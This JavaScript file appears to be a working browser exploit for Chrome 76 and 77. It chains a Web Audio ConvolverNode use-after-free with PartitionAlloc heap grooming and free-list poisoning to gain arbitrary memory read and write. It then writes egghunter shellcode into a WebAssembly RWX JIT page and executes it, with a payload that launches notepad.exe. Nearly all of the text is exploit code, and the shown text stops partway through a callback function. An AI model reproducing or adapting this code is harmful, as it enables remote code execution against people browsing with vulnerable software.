const Shellcode = new Uint8Array([ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x90, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0x90, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x90, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xea, 0x6f, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0x05, 0x00, 0x00, 0x00, 0x48, 0xb9, 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x48, 0xb9, 0x57, 0x53, 0x5c, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x51, 0x48, 0xb9, 0x43, 0x3a, 0x5c, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x51, 0x48, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0xae, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x0f, 0x86, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x0f, 0x85, 0xda, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x0f, 0x8c, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x39, 0xd0, 0x0f, 0x8d, 0x97, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfd, 0xff, 0xff, 0x8a, 0x14, 0x08, 0x80, 0xfa, 0x00, 0x74, 0x2f, 0x80, 0xfa, 0x2e, 0x75, 0x20, 0xc7, 0x03, 0x2e, 0x64, 0x6c, 0x6c, 0x48, 0x83, 0xc3, 0x04, 0xc6, 0x03, 0x00, 0xeb, 0x05, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0xff, 0xc1, 0xeb, 0xd3, 0x88, 0x13, 0x48, 0xff, 0xc1, 0x48, 0xff, 0xc3, 0xeb, 0xc9, 0xc6, 0x03, 0x00, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfd, 0xff, 0xff, 0xe8, 0x46, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x2e, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfe, 0xff, 0xff, 0xe8, 0x26, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0xb8, 0xe8, 0x82, 0xfe, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0xeb, 0x09, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0xe0, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]);
const Egghunter = new Uint8Array([ 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0xe8, 0x21, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xd2, 0x33, 0x0e, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6e, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc5, 0x4d, 0x31, 0xe4, 0x4d, 0x31, 0xf6, 0x4d, 0x31, 0xff, 0x4d, 0x85, 0xff, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x4d, 0x01, 0xf4, 0x49, 0xc7, 0xc0, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x41, 0xff, 0xd5, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x83, 0xf8, 0x30, 0x0f, 0x85, 0xc3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x4c, 0x8b, 0x70, 0x18, 0x4c, 0x8b, 0x20, 0x81, 0x78, 0x28, 0x00, 0x00, 0x02, 0x00, 0x75, 0xb1, 0x81, 0x78, 0x20, 0x00, 0x10, 0x00, 0x00, 0x75, 0xa8, 0x83, 0x78, 0x24, 0x04, 0x75, 0xa2, 0x4c, 0x89, 0xf1, 0x48, 0x83, 0xe9, 0x08, 0x48, 0x31, 0xd2, 0x48, 0xff, 0xca, 0x48, 0xbb, 0x10, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0xff, 0xc3, 0x48, 0xff, 0xc2, 0x48, 0x39, 0xca, 0x7d, 0x80, 0x49, 0x39, 0x1c, 0x14, 0x74, 0x02, 0xeb, 0xf0, 0x4d, 0x8d, 0x3c, 0x14, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x08, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7f, 0x13, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x10, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7c, 0x05, 0x4d, 0x31, 0xff, 0xeb, 0xcb, 0x48, 0x31, 0xc9, 0x49, 0x89, 0x0c, 0x14, 0x48, 0xc7, 0xc2, 0x3c, 0xd1, 0x38, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x9f, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4d, 0xc0, 0x49, 0xc7, 0xc0, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x48, 0x8b, 0x52, 0x18, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0x49, 0x83, 0xc7, 0x08, 0x41, 0xff, 0xd7, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0x18, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x76, 0x7e, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0x65, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x75, 0x4c, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x7c, 0x16, 0x48, 0x39, 0xd0, 0x7d, 0x11, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0x76, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]);
let DebugEgg = 0xeeeeeeee; // Used to create a magic QWORD to locate FastMalloc Extent/Super Pages in memory.
let GcPreventer = [];
let IIRFilters = [];
var SharedAudioCtx = undefined;
let FeedforwardSuperPageMetadata = undefined;
let OutputFloatArray = new Float32Array(10);
let MutableFreeListAudioBufs = [];
let DoubleAllocAudioBufs = [];
let ImageDataArray = [];
const EnableDebug = true;
const AlertOutput = false;
var HelperBuf = new ArrayBuffer(8);
var HelperDbl = new Float64Array(HelperBuf);
var HelperDword = new Uint32Array(HelperBuf);
var HelperBigInt = new BigUint64Array(HelperBuf);
var HelperUint8 = new Uint8Array(HelperBuf);
function DebugLog(Message) {
if(EnableDebug) {
if(AlertOutput) {
alert(Message);
}
else {
console.log(Message); // In IE, console only works if devtools is open.
}
}
}
function Sleep(delay) {
return new Promise(resolve => setTimeout(resolve, delay))
}
function ReverseBigInt(Val) {
let ReversedVal = BigInt(0);
let TempVal = Val;
for (let i = 0; i < 8; i++) {
ReversedVal = ReversedVal << BigInt(8);
ReversedVal += TempVal & BigInt(0xFF);
TempVal = TempVal >> BigInt(8);
}
return ReversedVal;
}
function ClearBigIntLow21(Val) {
let BitMask = (BigInt(1) << BigInt(21)) - BigInt(1); // 0000000000000000000000000000000000000000000111111111111111111111
let ClearedVal = Val & ~BitMask; // 1111111111111111111111111111111111111111111000000000000000000000
return ClearedVal;
}
let GetSuperPageBase = ClearBigIntLow21;
function GetSuperPageMetadata(LeakedPtr) {
let SuperPageBase = GetSuperPageBase(LeakedPtr);
return SuperPageBase + BigInt(0x1000); // Front and end Partition Pages of Super Page are Guard Pagees, with the exception of a single System Page at offset 0x1000 (second System Page) of the front end Partition Page
}
function GetPartitionPageIndex(LeakedPtr) {
let Low21Mask = (BigInt(1) << BigInt(21)) - BigInt(1);
let Index = (LeakedPtr & Low21Mask) >> BigInt(14);
return Index;
}
function GetPartitionPageMetadata(LeakedPtr) {
let Index = GetPartitionPageIndex(LeakedPtr);
let partitionPageMetadataPtr = GetSuperPageMetadata(LeakedPtr) + (Index * BigInt(0x20));
return partitionPageMetadataPtr;
}
function GetPartitionPageBase(LeakedPtr, Index) {
let SuperPageBase = GetSuperPageBase(LeakedPtr);
let PartitionPageBase = SuperPageBase + (Index << BigInt(14));
return PartitionPageBase;
}
function GC() {
let MyPromise = new Promise(function(GcCallback) {
let Arg;
for (var i = 0; i < 400; i++) {
new ArrayBuffer(1024 * 1024 * 60).buffer;
}
GcCallback(Arg);
});
return MyPromise;
}
/*
chrome_child!WTF::ArrayBufferContents::AllocateMemoryWithFlags+0xcf:
00007ffa`cc086513 488b0e mov rcx,qword ptr [rsi] ds:00007ffe`0fc70000=????????????????
*/
function LeakQword(FreeListHead, TargetAddress) {
FreeListHead[0] = TargetAddress;
let TempVal = new BigUint64Array;
TempVal.buffer;
GcPreventer.push(TempVal);
return ReverseBigInt(FreeListHead[0]);
}
function WriteQword(FreeListHead, TargetAddress, Val) {
FreeListHead[0] = TargetAddress;
let TempVal = new BigUint64Array(1);
TempVal.buffer;
TempVal[0] = Val;
GcPreventer.push(TempVal);
}
function CreateWasmJITExport() {
/*
After this function returns, a new region of memory will appear with a
single system page of 0x1000 bytes set to RWX for the JIT region for
this WASM module
0x00000ACDB6790000:0x40000000 | Private
0x00000ACDB6790000:0x00001000 | RX | 0x00000000 | Abnormal private executable memory
0x00000ACDB6791000:0x00001000 | RWX | 0x00000000 | Abnormal private executable memory
*/
var ImportObj = { imports: { imported_func: arg => console.log(arg) } };
const WasmModuleBytes = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
const WasmCode = new Uint8Array(WasmModuleBytes);
const WasmModule = new WebAssembly.Instance(new WebAssembly.Module(WasmCode), ImportObj);
return WasmModule.exports.exported_func;
}
/*
struct __attribute__((packed)) SlotSpanMetadata {
unsigned long freelist_head;
unsigned long next_slot_span;
unsigned long bucket;
uint32_t marked_full : 1;
uint32_t num_allocated_slots : 13;
uint32_t num_unprovisioned_slots : 13;
uint32_t can_store_raw_size : 1;
uint32_t freelist_is_sorted : 1;
uint32_t unused1 : (32 - 1 - 2 * 13 - 1 - 1);
uint16_t in_empty_cache : 1;
uint16_t empty_cache_index : 7;
uint16_t unused2 : (16 - 1 - 7);
};
struct PartitionPage {
union {
struct SlotSpanMetadata span;
size_t raw_size;
struct PartitionSuperPageExtentEntry head;
struct {
char pad[32 - sizeof(uint16_t)];
uint16_t slot_span_metadata_offset;
};
};
};
struct PartitionBucket {
unsigned long active_slot_spans_head;
unsigned long empty_slot_spans_head;
unsigned long decommitted_slot_spans_head;
uint32_t slot_size;
uint32_t num_system_pages_per_slot_span : 8;
uint32_t num_full_slot_spans : 24;
};
*/
function HuntSlotSpanHead(FreeListHead, SlotSize, SuperPageMetadataBase) {
for(var SpanIndex = 0; SpanIndex < 128; SpanIndex++) {
SlotSpanMetaAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20 + 0x10); // Always an extra 0x20 to account for start of SuperPage struct
HelperBigInt[0] = SlotSpanMetaAddress;
DebugLog("... targetting slot span metadata at " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));
BucketAddress = LeakQword(FreeListHead, SlotSpanMetaAddress);
HelperBigInt[0] = BucketAddress;
DebugLog("... leaked bucket address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));
if(BucketAddress != BigInt(0)) {
BucketAddress = BucketAddress + BigInt(0x18); // PartitionBucket.slot_size
BucketSize = LeakQword(FreeListHead, BucketAddress);
HelperBigInt[0] = BucketSize;
DebugLog("... leaked bucket size is " + HelperDword[1].toString(16) + " " + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));
if(HelperDword[0] == SlotSize) {
DebugLog("... found desired slot size! Reading freelist head for SlotSpan...");
SlotSpanFreeListAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20); // Always an extra 0x20 to account for start of SuperPage struct
HelperBigInt[0] = LeakQword(FreeListHead, SlotSpanFreeListAddress);
DebugLog("... leaked slot span freelist address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));
return HelperBigInt[0];
}
}
}
}
function ExecutePayload(FreeListHead) {
var WasmExport = CreateWasmJITExport();
let FileReaderObj = new FileReader;
let FileReaderLoaderSize = 0x140; // Literal size is 0x128, 0x140 is the bucket size post-alignment
DebugLog("... WASM module and FileReader created.");
FileReaderObj.onerror = WasmExport;
let FileReaderLoaderPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);
if (!FileReaderLoaderPtr) {
DebugLog("... failed to obtain free list head for bucket size 0x140 slot span");
return;
}
HelperBigInt[0] = FileReaderLoaderPtr;
DebugLog("... estimated a FileReaderLoader alloc address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
FileReaderObj.readAsArrayBuffer(new Blob([])); // It is not the blob causing the allocation: FileReaderLoader itself as a class is allocated into the FastMalloc Extent
let ValidationPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);
if(ValidationPtr != FileReaderLoaderPtr) {
HelperBigInt[0] = ValidationPtr;
DebugLog("... successfully validated re-claim of FileReaderLoader slot (free list head for slot span has been re-claimed) at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
let FileReaderPtr = LeakQword(FreeListHead, FileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);
let VectorPtr = LeakQword(FreeListHead, FileReaderPtr + BigInt(0x28));
let RegisteredEventListenerPtr = LeakQword(FreeListHead, VectorPtr);
let EventListenerPtr = LeakQword(FreeListHead, RegisteredEventListenerPtr);
let EventHandlerPtr = LeakQword(FreeListHead, EventListenerPtr + BigInt(0x8));
let JsFuncObjPtr = LeakQword(FreeListHead, EventHandlerPtr + BigInt(0x8));
let JsFuncPtr = LeakQword(FreeListHead, JsFuncObjPtr) - BigInt(1);
let SharedFuncInfoPtr = LeakQword(FreeListHead, JsFuncPtr + BigInt(0x18)) - BigInt(1);
let WasmExportedFunctDataPtr = LeakQword(FreeListHead, SharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);
let WasmInstancePtr = LeakQword(FreeListHead, WasmExportedFunctDataPtr + BigInt(0x10)) - BigInt(1);
let StubAddrFieldOffset = undefined;
switch (MajorVersion) {
case 77:
StubAddrFieldOffset = BigInt(0x8) * BigInt(16);
break;
case 76:
StubAddrFieldOffset = BigInt(0x8) * BigInt(17);
break
}
let RwxJitStubPtr = LeakQword(FreeListHead, WasmInstancePtr + StubAddrFieldOffset);
HelperBigInt[0] = RwxJitStubPtr;
DebugLog("... resolved JIT stub address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
for(var x = 0; x < Egghunter.length; x += 8) {
JitChunkAddress = RwxJitStubPtr + BigInt(x);
HelperBigInt[0] = JitChunkAddress;
//DebugLog("... writing chunk of egghunter shellcode at offset " + x.toString(10) + " to JIT region at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
for(var y = 0; y < 8; y++) {
HelperUint8[y] = Egghunter[x + y];
}
WriteQword(FreeListHead, JitChunkAddress, HelperBigInt[0]);
}
HelperBigInt[0] = RwxJitStubPtr;
DebugLog("... executing shellcode at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
WasmExport();
}
else {
DebugLog("... failed to validate re-claim of FileReaderLoader slot at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
}
}
async function PrePayloadHeapGroom() {
DebugLog("... grooming heap in preparation for R/W primitive creation and payload execution...");
await GC();
DoubleAllocAudioBufs = []; // These were the "holders" making sure Chrome itself didn't re-claim feedforward up until this point. Now free and immediately re-claim them, once again as audio buffers.
for (var j = 0; j < 80; j++) {
MutableFreeListAudioBufs.push(SharedAudioCtx.createBuffer(1, 2, 10000));
}
// At this stage, feedforward is double allocated. Once as a feedforward or IIRFilters, and once as an audio buffer. Here we are putting it into double use, wherein as a feedforward it will now be (truly) free (and in the freelist), while in the other it is a committed/allocated audio buffer we can R/W.
IIRFilters = new Array(1);
await GC();
for (var j = 0; j < 336; j++) {
ImageDataArray.push(new ImageData(1, 2));
}
ImageDataArray = new Array(10);
await GC();
for (var j = 0; j < MutableFreeListAudioBufs.length; j++) {
let MutableFreeListEntry = new BigUint64Array(MutableFreeListAudioBufs[j].getChannelData(0).buffer);
if (MutableFreeListEntry[0] != BigInt(0)) {
let FreeListHeadPtr = GetPartitionPageMetadata(ReverseBigInt(MutableFreeListEntry[0])); // Extract the Super Page base/metadata entry for the leaked flink from feedforward: this will be in an ArrayMalloc Extent as opposed to the FastMalloc Extent.
let AllocCount = 0;
MutableFreeListEntry[0] = ReverseBigInt(FreeListHeadPtr);
// Spray new 8 byte allocations until our (controlled) poisoned free list flink entry is allocated
do {
GcPreventer.push(new ArrayBuffer(8));
if (++AllocCount > 0x100000) {
DebugLog("... failed to re-claim final free list flink with alloc spray");
return; // If we sprayed this number of allocations without our poisoned flink being consumed, assume the re-claim failed
}
} while (MutableFreeListEntry[0] != BigInt(0));
// The last allocation consumed our mutable free list flink entry (which we had poisoned the flink of to point at the free list head metadata on the Super Page head).
let FreeListHead = new BigUint64Array(new ArrayBuffer(8)); // Alloc the free list head itself. We can now control where new allocs are made without needing to do sprays.
GcPreventer.push(FreeListHead);
ExecutePayload(FreeListHead);
return;
}
}
return;
}
async function DoubleAllocUAF(FeedforwardAddress, CallbackFunc) {
let NumberOfChannels = 1;
let TempAudioCtx = new OfflineAudioContext(NumberOfChannels, 48000 * 100, 48000);
let AudioBufferSourceNode = TempAudioCtx.createBufferSource();
let ConvolverNode = TempAudioCtx.createConvolver();
let Finished = false;
// Create and initialize two shared audio buffers: one for the buffer source, the other for the convolver (UAF)
let BigSourceBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x100, 48000);
let SmallUafBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x2, 48000);
SmallUafBuf.getChannelData(0).fill(0);
for (var i = 0; i < NumberOfChannels; i++) {
var ChannelData = new BigUint64Array(BigSourceBuf.getChannelData(i).buffer);
ChannelData[0] = FeedforwardAddress;
}
AudioBufferSourceNode.buffer = BigSourceBuf;
ConvolverNode.buffer = SmallUafBuf;
// Setup the audio processing graph and begin rendering
AudioBufferSourceNode.loop = true;
AudioBufferSourceNode.loopStart = 0;
AudioBufferSourceNode.loopEnd = 1;
AudioBufferSourceNode.connect(ConvolverNode);
ConvolverNode.connect(TempAudioCtx.destination);
AudioBufferSourceNode.start();
TempAudioCtx.startRendering().then(function(Buf) {
Buf = null;
if (Finished) {
TempAudioCtx = null;
setTimeout(CallbackFunc, 200);
return;
} else {
Finished = true;
setTimeout(function() { DoubleAllocUAF(FeedforwardAddress, CallbackFunc); }, 1);
}
});
while (!Finished) {
ConvolverNode.buffer = null;
await Sleep(1); // Give a small bit of time for the renderer to write the feedforward address into the freed buffer
if (Finished) {
break;
}
for (let i = 0; i < IIRFilters.length; i++) {
OutputFloatArray.fill(0); // Initialize the array to all 0's the Nyquist filter created by getFrequencyResponse will see it populated by PI.
IIRFilters[i].getFrequencyResponse(OutputFloatArray, OutputFloatArray, OutputFloatArray);
if (OutputFloatArray[0] != 3.1415927410125732) {
Finished = true;
DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); // These 2 allocs are accessing the fake flink in the feedforward array and re-claiming/"holding" it until the final UAF callback is called. We do not want Chrome to accidentally re-claim feedforward on its own.
DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000));
AudioBufferSourceNode.disconnect();
ConvolverNode.disconnect();
return;
}
}
ConvolverNode.buffer = SmallUafBuf;
await Sleep(1);
}
}
function InfoleakUAFCallback(LeakedFlinkPtr, RenderCount) {
SharedAudioCtx = new OfflineAudioContext(1, 1, 3000); // This is a globally scoped context: its initialization location is highly sensitive to the heap layout later on (created after the infoleak UAF, but before the pre-payload heap grooming where it is used)
HelperBigInt[0] = LeakedFlinkPtr;
DebugLog("... leaked free list ptr from ScriptNode audio handler at iteration " + RenderCount.toString(10) + ": " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
HelperBigInt[0] = GetSuperPageBase(LeakedFlinkPtr);
